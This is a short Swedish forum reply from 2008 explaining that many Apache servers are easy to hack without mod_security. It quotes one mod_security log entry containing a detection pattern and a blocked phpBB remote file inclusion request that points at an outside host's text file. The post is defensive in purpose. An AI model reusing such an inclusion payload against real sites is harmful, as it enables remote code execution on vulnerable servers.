Citat:
Originally posted by Nicklas@Jan 15 2008, 08:17
Vad bygger dessa sajter på, är det open source?
Det borde finnas en röd tråd i dessa hackade sajter som gör dem enklare att hacka.
|
Troligen inte, opensource är faktiskt ofta säkrare än hemmabygda sajter.
En sak som gör att många apache servrar är mkt lätta att hacka är att folk inte har vett nog att köra mod_security i apache.
Här är ett exempel från en logg med mod_security:
Citat:
mod_security: Access denied with code 403. Pattern match "=(http|www|ftp)\\\\:/(.+)\\\\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp| dat|txt|js|html?|tmp|asp)\\\\x20?\\\\?" at REQUEST_URI [id "390144"] [rev "1"] [msg "Rootkit attack: Generic Attempt to install rootkit"] [severity "CRITICAL"] [uri "/includes/functions.php?phpbb_root_path=http://www.gumgangfarm.com/shop/data/id.txt?"]
|